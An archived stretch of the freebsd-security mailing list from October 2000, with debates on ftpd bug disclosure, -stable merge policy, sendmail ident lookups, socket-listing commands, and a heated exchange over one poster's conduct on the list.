<4.3.2.7.2.20001002125825.00de8f00@localhost> <4.3.2.7.2.20001002123113.049344d0@localhost> <4.3.2.7.2.20001002125825.00de8f00@localhost> <20001002143917.B22329@freefall.freebsd.org> <4.3.2.7.2.20001002173916.046c16f0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 02:38 AM 10/3/2000, Dave McKay wrote: >Brett, > >This bug was a non-issue from the start, why did you have to drag your results on >to the list? Wasn't it apparent after Warner said that they no longer support >older releases of FreeBSD due to resource shortness that the thread was pointless? It is important to warn people who are still using older releases of FreeBSD of security problems in them, even if they are not officially "supported." There are many people out there who use and depend on them. It is mean-spirited of you, IMHO, to lobby to cut those people off. >My second rant is, have you ever noticed WHENEVER you write into the list its ALWAYS >the longest current thread running within a VERY short time? Not always. However, I like to think that when it does happen it is usually because the issues I mention are important. Of course, some people also seem to enjoy flaming me, as you are doing here. >Do you think this is >because of your genius in the BSD OS field? Or perhaps its due to your keen wits >being always about you when you write in. See above. > Please, and I mean this, DIE. What a friendly, constructive, and helpful sentiment. Not. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 9:33:59 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id D441C37B66C; Tue, 3 Oct 2000 09:33:56 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id KAA18962; Tue, 3 Oct 2000 10:33:50 -0600 (MDT) Message-Id: <4.3.2.7.2.20001003103242.04c5a240@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 03 Oct 2000 10:33:45 -0600 To: Wes Peters From: Brett Glass Subject: Re: ftpd bug in FreeBSD through at least 3.4 Cc: Kris Kennaway , Alex Charalabidis , "Chris D . Faulhaber" , security@FreeBSD.org In-Reply-To: <39D9A4BB.1DB621CD@softweyr.com> References: <4.3.2.7.2.20001002125825.00de8f00@localhost> <4.3.2.7.2.20001002123113.049344d0@localhost> <4.3.2.7.2.20001002125825.00de8f00@localhost> <4.3.2.7.2.20001002173916.046c16f0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 03:19 AM 10/3/2000, Wes Peters wrote: >A packet trace would be helpful here. I find ethereal to be quite an >agreeable tool. This is a good idea. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 9:39:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 157FA37B503 for ; Tue, 3 Oct 2000 09:39:24 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id KAA19065; Tue, 3 Oct 2000 10:38:04 -0600 (MDT) Message-Id: <4.3.2.7.2.20001003103503.04c68240@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 03 Oct 2000 10:37:58 -0600 To: Wes Peters From: Brett Glass Subject: Re: politeness Cc: security@FreeBSD.ORG In-Reply-To: <39D9AC91.8CA24148@softweyr.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 03:53 AM 10/3/2000, Wes Peters wrote: >> Everyone has a right to write to the list and share his thoughts. > >No, the list has a charter. This is a republic, not a democracy. Does that mean that to get something posted to the list, I need to contact my representative, who doesn't respond to me because I'm not a member of his political party? Or has a staffer send me back a boilerplate form letter and then does what his large corporate contributors want? ;-) Aargh. I am very glad that mailing lists are NOT republics. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 9:40:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from cheddar.netmonger.net (cheddar.netmonger.net [209.54.21.140]) by hub.freebsd.org (Postfix) with ESMTP id 3742A37B670; Tue, 3 Oct 2000 09:40:22 -0700 (PDT) Received: (from chris@localhost) by cheddar.netmonger.net (8.8.8/8.8.8) id MAA05685; Tue, 3 Oct 2000 12:40:08 -0400 (EDT) Message-ID: <20001003124008.A4892@netmonger.net> Date: Tue, 3 Oct 2000 12:40:08 -0400 From: Christopher Masto To: Warner Losh , Paul Richards Cc: Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: cvs commit: src/usr.bin/finger finger.c Mail-Followup-To: Warner Losh , Paul Richards , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG References: <39D98B55.126DAFC4@originative.co.uk> <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> <39D98B55.126DAFC4@originative.co.uk> <200010031530.JAA26493@harmony.village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.91.1i In-Reply-To: <200010031530.JAA26493@harmony.village.org>; from Warner Losh on Tue, Oct 03, 2000 at 09:30:13AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 09:30:13AM -0600, Warner Losh wrote: > : I think we push too many enhancements from current to stable, when we > : should really only push bug fixes onto the stable branch. The tendency > : to add enhancements carries the risk of actually creating new bugs in > : stable which is obviously not what we want to have happen. > > Exactly. We shouldn't be merging features at all, unless there's a > compelling reason, the code has been reviewed by at least two people > and it has had at least a month or two in current. If you can't find > two people to review the code, then you can't merge it to stable due > to lack of interest. The problem with being too cautious is that stable becomes unusable and people who shouldn't be running current start moving to it because stable doesn't support their new laptop. I think it's important to push _some_ features into stable. Having to wait several years for the next major "point-oh" release of FreeBSD (which comes with "point-oh fear" holding it back) is not the best way to do things. IMO. There's a place between these two extremes of paranoia and wild abandon, and I think that's where the MFCs should take place. -- Christopher Masto Senior Network Monkey NetMonger Communications chris@netmonger.net info@netmonger.net http://www.netmonger.net Free yourself, free your machine, free the daemon -- http://www.freebsd.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 9:45:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id E61C837B502 for ; Tue, 3 Oct 2000 09:45:29 -0700 (PDT) Received: from bsdie.rwsystems.net([209.197.223.2]) (1250 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Tue, 3 Oct 2000 11:25:18 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Tue, 3 Oct 2000 11:25:18 -0500 (CDT) From: James Wyatt To: Dag-Erling Smorgrav Cc: Michael Bryan , security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 3 Oct 2000, Dag-Erling Smorgrav wrote: > Michael Bryan writes: > > A command that I -always- execute on any freshly installed system, and from > > time to time when checking up on things: > > > > netstat -an > > Funny way to spell "sockstat except with less information" :) More and less. netstat -an is longer, sockstat has more columns. I like the PID given in sockstat, but is there any way to get them for Unix domain sockets? I tried "apropos domain" and "(for DIR in `echo $PATH | tr ':' ' '` ; do ls $DIR 2> /dev/null | grep stat ; done) | more", but neither gave me much help... - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 9:50: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (flutter.freebsd.dk [212.242.40.147]) by hub.freebsd.org (Postfix) with ESMTP id 1440F37B66C for ; Tue, 3 Oct 2000 09:50:04 -0700 (PDT) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.0/8.9.3) with ESMTP id e93GmeN49244; Tue, 3 Oct 2000 18:48:40 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Brett Glass Cc: Wes Peters , security@FreeBSD.ORG Subject: Re: politeness In-Reply-To: Your message of "Tue, 03 Oct 2000 10:37:58 MDT." <4.3.2.7.2.20001003103503.04c68240@localhost> Date: Tue, 03 Oct 2000 18:48:40 +0200 Message-ID: <49242.970591720@critter> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.3.2.7.2.20001003103503.04c68240@localhost>, Brett Glass writes: >At 03:53 AM 10/3/2000, Wes Peters wrote: > >>> Everyone has a right to write to the list and share his thoughts. >> >>No, the list has a charter. This is a republic, not a democracy. > >Does that mean that to get something posted to the list, I need to >contact my representative, who doesn't respond to me because >I'm not a member of his political party? Or has a staffer send me >back a boilerplate form letter and then does what his large >corporate contributors want? ;-) In your particular case: If you want to avoid being banned and filtered: Yes, it means that. In all my time in core, nobody even closely rivals your uncontested number one ranking as the person most people want banned & filtered from our lists. Depending on your luck, or lack of it, the core team may finally have had it with freedom, liberty and equality in your particular case, if you don't learn to control your emails style and quantity pretty damn fast. Doesn't the fact that your are universally more unpopular than anybody else with the FreeBSD developers trigger any kind of thought process in you ? Doesn't it make just a tiny little bit of doubt rear its ugly head, questioning your approach when you communicate on our lists ? I would have hoped so... -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD coreteam member | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 9:58:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 2BD7637B502; Tue, 3 Oct 2000 09:58:34 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e93GwUM10196; Tue, 3 Oct 2000 10:58:31 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id KAA27159; Tue, 3 Oct 2000 10:58:30 -0600 (MDT) Message-Id: <200010031658.KAA27159@harmony.village.org> To: Christopher Masto Subject: Re: cvs commit: src/usr.bin/finger finger.c Cc: Paul Richards , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Tue, 03 Oct 2000 12:40:08 EDT." <20001003124008.A4892@netmonger.net> References: <20001003124008.A4892@netmonger.net> <39D98B55.126DAFC4@originative.co.uk> <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> <39D98B55.126DAFC4@originative.co.uk> <200010031530.JAA26493@harmony.village.org> Date: Tue, 03 Oct 2000 10:58:30 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20001003124008.A4892@netmonger.net> Christopher Masto writes: : The problem with being too cautious is that stable becomes unusable : and people who shouldn't be running current start moving to it because : stable doesn't support their new laptop. That's a compelling reason. However, rushing it into stable to keep one or two people from running -current isn't in our best interests either. You'll notice that I say you need two people to check the code. If you can't find two people to check the code, then nobody cares enough for it to go into stable. Two people. I didn't say two committers, but two people who can review the code. If you can't meet that low threshold, then you shouldn't merge the new feature. Period. : I think it's important to push _some_ features into stable. Having to : wait several years for the next major "point-oh" release of FreeBSD : (which comes with "point-oh fear" holding it back) is not the best : way to do things. IMO. There's a place between these two extremes : of paranoia and wild abandon, and I think that's where the MFCs should : take place. I don't advocate paranoia. I advocate caution and good engineering practices before code can be allowed into MFC, especially new features. We used to be really good about this and as we've grown the cautious merge into -stable ethic has become diluted. It is time to tighten things down for a while again. The finger thing has shown that the current practices are too loose. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 10: 2: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 74A1B37B66C for ; Tue, 3 Oct 2000 10:01:57 -0700 (PDT) Received: (qmail 33682 invoked by uid 1000); 3 Oct 2000 17:03:07 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 3 Oct 2000 17:03:07 -0000 Date: Tue, 3 Oct 2000 12:03:07 -0500 (CDT) From: Mike Silbersack To: Nate Williams Cc: Jordan Hubbard , Alfred Perlstein , "Jordan K. Hubbard" , security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf In-Reply-To: <200010031611.KAA23351@nomad.yogotech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 3 Oct 2000, Nate Williams wrote: > > Isn't sendmail just as happy getting a RST back when it tries to > > connect? > > Yep, but it slows mail transfers down quite a bit. > > > Nate Does sendmail retry when it gets a connection refused back? If it's only trying once, there shouldn't be any extra delay that I can see. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 10: 5:29 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 9288A37B66C; Tue, 3 Oct 2000 10:05:24 -0700 (PDT) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id LAA28833; Tue, 3 Oct 2000 11:05:05 -0600 (MDT) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id LAA23799; Tue, 3 Oct 2000 11:05:05 -0600 (MDT) (envelope-from nate) Date: Tue, 3 Oct 2000 11:05:05 -0600 (MDT) Message-Id: <200010031705.LAA23799@nomad.yogotech.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Mike Silbersack Cc: Nate Williams , Jordan Hubbard , Alfred Perlstein , "Jordan K. Hubbard" , security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf In-Reply-To: References: <200010031611.KAA23351@nomad.yogotech.com> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > Isn't sendmail just as happy getting a RST back when it tries to > > > connect? > > > > Yep, but it slows mail transfers down quite a bit. > > > > > > Nate > > Does sendmail retry when it gets a connection refused back? Yep, but having to do a retry for every incoming connection can be quite a slowdown when you receive *LOTS* of email. Any FreeBSD user who has that on his box is slowing down delivery of email significantly, because the FreeBSD mailing lists tend to generate *lots* of email messages. :) Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 10:16:25 2000 Delivered-To: freebsd-security@freebsd.org Received: from zeta.qmw.ac.uk (zeta.qmw.ac.uk [138.37.6.6]) by hub.freebsd.org (Postfix) with ESMTP id 7203C37B503 for ; Tue, 3 Oct 2000 10:16:22 -0700 (PDT) Received: from xi.css.qmw.ac.uk ([138.37.8.11]) by zeta.qmw.ac.uk with esmtp (Exim 3.02 #1) id 13gVfo-0002ZL-00 for security@freebsd.org; Tue, 03 Oct 2000 18:16:12 +0100 Received: from cgaa180 by xi.css.qmw.ac.uk with local (Exim 1.92 #1) for security@freebsd.org id 13gVfo-0006bL-00; Tue, 3 Oct 2000 18:16:12 +0100 X-Mailer: exmh version 2.0.2 2/24/98 To: security@freebsd.org Subject: Re: cvs commit: src/etc inetd.conf In-reply-to: Your message of "Tue, 03 Oct 2000 11:05:05 MDT." <200010031705.LAA23799@nomad.yogotech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 03 Oct 2000 18:16:12 +0100 From: David Pick Message-Id: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > > Isn't sendmail just as happy getting a RST back when it tries to > > > > connect? > > > > > > Yep, but it slows mail transfers down quite a bit. > > > > > > > > > Nate > > > > Does sendmail retry when it gets a connection refused back? > > Yep, but having to do a retry for every incoming connection can be quite > a slowdown when you receive *LOTS* of email. Any FreeBSD user who has > that on his box is slowing down delivery of email significantly, because > the FreeBSD mailing lists tend to generate *lots* of email messages. :) Sorry, I don't get this. If sendmail attempts to call the "auth" port on the sending machine and gets a response it should be happy. If it gets no response (after a time-out) it would be entitled to retry a few times in case of packet loss. *But* if it gets a RST, which is a positive rejection of the connection attempt, it can deduce that there is *no* "auth" service on the remote machine, and that retrys are a waste of time. Most clients (like "telnet") report this as "connection refused" if it happens on the main connection channel. An ICMP response might well be a transient condition, but a RST isn't. Unless sendmail takes the view that *any* error *might* be a transient condition and a retry or two worthwhile. -- David Pick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 10:19:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from whale.sunbay.crimea.ua (whale.sunbay.crimea.ua [212.110.138.65]) by hub.freebsd.org (Postfix) with ESMTP id 304F937B502 for ; Tue, 3 Oct 2000 10:19:13 -0700 (PDT) Received: (from ru@localhost) by whale.sunbay.crimea.ua (8.11.0/8.11.0) id e93HIrP65664; Tue, 3 Oct 2000 20:18:53 +0300 (EEST) (envelope-from ru) Date: Tue, 3 Oct 2000 20:18:53 +0300 From: Ruslan Ermilov To: James Wyatt Cc: security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf Message-ID: <20001003201853.A64879@sunbay.com> Mail-Followup-To: James Wyatt , security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from jwyatt@rwsystems.net on Tue, Oct 03, 2000 at 11:25:18AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 11:25:18AM -0500, James Wyatt wrote: > On 3 Oct 2000, Dag-Erling Smorgrav wrote: > > Michael Bryan writes: > > > A command that I -always- execute on any freshly installed system, and from > > > time to time when checking up on things: > > > > > > netstat -an > > > > Funny way to spell "sockstat except with less information" :) > > More and less. netstat -an is longer, sockstat has more columns. I like > the PID given in sockstat, but is there any way to get them for Unix > domain sockets? I tried "apropos domain" and "(for DIR in `echo $PATH | tr > ':' ' '` ; do ls $DIR 2> /dev/null | grep stat ; done) | more", but > neither gave me much help... - Jy@ > Sure there is, try `netstat -an -funix' followed by `fstat | grep local'. -- Ruslan Ermilov Oracle Developer/DBA, ru@sunbay.com Sunbay Software AG, ru@FreeBSD.org FreeBSD committer, +380.652.512.251 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 10:22:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 50BA637B66C for ; Tue, 3 Oct 2000 10:22:35 -0700 (PDT) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id NAA41823; Tue, 3 Oct 2000 13:22:27 -0400 (EDT) (envelope-from wollman) Date: Tue, 3 Oct 2000 13:22:27 -0400 (EDT) From: Garrett Wollman Message-Id: <200010031722.NAA41823@khavrinen.lcs.mit.edu> To: David Pick Cc: security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf In-Reply-To: References: <200010031705.LAA23799@nomad.yogotech.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > gets no response (after a time-out) it would be entitled to retry a > few times in case of packet loss. *But* if it gets a RST, which is a If net.inet.tcp.blackhole is set, an RST will not be emitted. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 10:23: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from public.bta.net.cn (public.bta.net.cn [202.96.0.97]) by hub.freebsd.org (Postfix) with SMTP id 5D81037B503 for ; Tue, 3 Oct 2000 10:22:59 -0700 (PDT) Received: from netrinsics.com([202.106.4.185]) by public.bta.net.cn(JetMail 2.5.3.0) with SMTP id jm039da5f8a; Tue, 3 Oct 2000 17:22:51 -0000 Received: (from robinson@localhost) by netrinsics.com (8.11.0/8.9.3) id e93HM4d03128; Wed, 4 Oct 2000 01:22:04 +0800 (+0800) (envelope-from robinson) Date: Wed, 4 Oct 2000 01:22:04 +0800 (+0800) From: Michael Robinson Message-Id: <200010031722.e93HM4d03128@netrinsics.com> To: phk@critter.freebsd.dk Subject: Re: politeness Cc: security@FreeBSD.ORG In-Reply-To: <49242.970591720@critter> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >In all my time in core, nobody even closely rivals your uncontested >number one ranking as the person most people want banned & filtered >from our lists. Is there someplace non-core members can vote on this? A cgi form or something? -Michael Robinson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 10:26:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (flutter.freebsd.dk [212.242.40.147]) by hub.freebsd.org (Postfix) with ESMTP id 6459F37B66C for ; Tue, 3 Oct 2000 10:26:33 -0700 (PDT) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.0/8.9.3) with ESMTP id e93HQSN49536; Tue, 3 Oct 2000 19:26:28 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Michael Robinson Cc: security@FreeBSD.ORG Subject: Re: politeness In-Reply-To: Your message of "Wed, 04 Oct 2000 01:22:04 +0800." <200010031722.e93HM4d03128@netrinsics.com> Date: Tue, 03 Oct 2000 19:26:28 +0200 Message-ID: <49534.970593988@critter> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <200010031722.e93HM4d03128@netrinsics.com>, Michael Robinson writes: >>In all my time in core, nobody even closely rivals your uncontested >>number one ranking as the person most people want banned & filtered >>from our lists. > >Is there someplace non-core members can vote on this? A cgi form or something? Send email to core. -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD coreteam member | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 10:32:13 2000 Delivered-To: freebsd-security@freebsd.org Received: from orthanc.ab.ca (207-167-15-66.dsl.worldgate.ca [207.167.15.66]) by hub.freebsd.org (Postfix) with ESMTP id 3114B37B66C for ; Tue, 3 Oct 2000 10:32:07 -0700 (PDT) Received: from orthanc.ab.ca (localhost [127.0.0.1]) by orthanc.ab.ca (8.11.0/8.11.0.Beta3) with ESMTP id e93HVRE59359; Tue, 3 Oct 2000 11:31:27 -0600 (MDT) Message-Id: <200010031731.e93HVRE59359@orthanc.ab.ca> To: David Pick Cc: security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf In-reply-to: Your message of "Tue, 03 Oct 2000 18:16:12 BST." Date: Tue, 03 Oct 2000 11:31:27 -0600 From: Lyndon Nerenberg Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >>>>> "David" == David Pick writes: David> Sorry, I don't get this. If sendmail attempts to call the David> "auth" port on the sending machine and gets a response it David> should be happy. If it gets no response (after a time-out) David> it would be entitled to retry a few times in case of packet David> loss. No it wouldn't. TCP takes care of the retries for you. If the auth service is blocked by a firewall the firewall will usually eat the SYN packets, and you will never get a RST. --lyndon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 10:32:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailgate.originative.co.uk (mailgate.originative.co.uk [194.217.50.228]) by hub.freebsd.org (Postfix) with ESMTP id ABE6C37B502; Tue, 3 Oct 2000 10:32:29 -0700 (PDT) Received: from originative.co.uk (lobster.originative.co.uk [194.217.50.241]) by mailgate.originative.co.uk (Postfix) with ESMTP id 5B07D1D140; Tue, 3 Oct 2000 18:32:28 +0100 (BST) Message-ID: <39DA182C.C70ED553@originative.co.uk> Date: Tue, 03 Oct 2000 18:32:28 +0100 From: Paul Richards X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Christopher Masto Cc: Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: cvs commit: src/usr.bin/finger finger.c References: <39D98B55.126DAFC4@originative.co.uk> <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> <39D98B55.126DAFC4@originative.co.uk> <200010031530.JAA26493@harmony.village.org> <20001003124008.A4892@netmonger.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Christopher Masto wrote: > > On Tue, Oct 03, 2000 at 09:30:13AM -0600, Warner Losh wrote: > > : I think we push too many enhancements from current to stable, when we > > : should really only push bug fixes onto the stable branch. The tendency > > : to add enhancements carries the risk of actually creating new bugs in > > : stable which is obviously not what we want to have happen. > > > > Exactly. We shouldn't be merging features at all, unless there's a > > compelling reason, the code has been reviewed by at least two people > > and it has had at least a month or two in current. If you can't find > > two people to review the code, then you can't merge it to stable due > > to lack of interest. > > The problem with being too cautious is that stable becomes unusable > and people who shouldn't be running current start moving to it because > stable doesn't support their new laptop. The people who are using FreeBSD in production environments need to have bug fixes made available for their stable version of the OS. If applying bug fixes de-stabilises their production environment then they're not very happy at all. I think the emphasis of the stable branch should be too support those production users. The users who are chasing features will always be pushing for a "stable current" and want the best of both worlds; new features *and* stability. Unfortunately that's an unachievable ideal and we shouldn't penalise those who really need the stability in trying to meet it. We're not applying sound software engineering practices anymore and that used to be what differentiated us from other projects. New code needs to be thoroughly tested before it's stamped as suitable for production use and I think the desire to make life easier, by merging things sooner rather than later when they might get forgotten about, is having a detrimental effect on the quality of stable. I think we should have a stable release team, that changes to the stable branch should be gated through to ensure they're thouroughly tested and that there's a need for them to be backported. I'd be happy to work with anyone else who wants to volunteer to do that since maintaining a stable version of the OS is a major issue for me with my new hat on. Paul Richards FreeBSD Services Ltd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 10:35:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 4585537B503; Tue, 3 Oct 2000 10:35:11 -0700 (PDT) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id NAA42007; Tue, 3 Oct 2000 13:35:10 -0400 (EDT) (envelope-from wollman) Date: Tue, 3 Oct 2000 13:35:10 -0400 (EDT) From: Garrett Wollman Message-Id: <200010031735.NAA42007@khavrinen.lcs.mit.edu> To: Robert Watson Cc: security@FreeBSD.ORG Subject: Re: Multiple userids, one user In-Reply-To: References: <200010010526.BAA12242@khavrinen.lcs.mit.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > providing the application with unfettered access to your X display does a I don't. The insecure applications run under a completely separate X server. Barring any gaping security holes in the X server, there is no way for these applications (netscape specifically) to communicate with those running in the more-trustworthy domain. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To 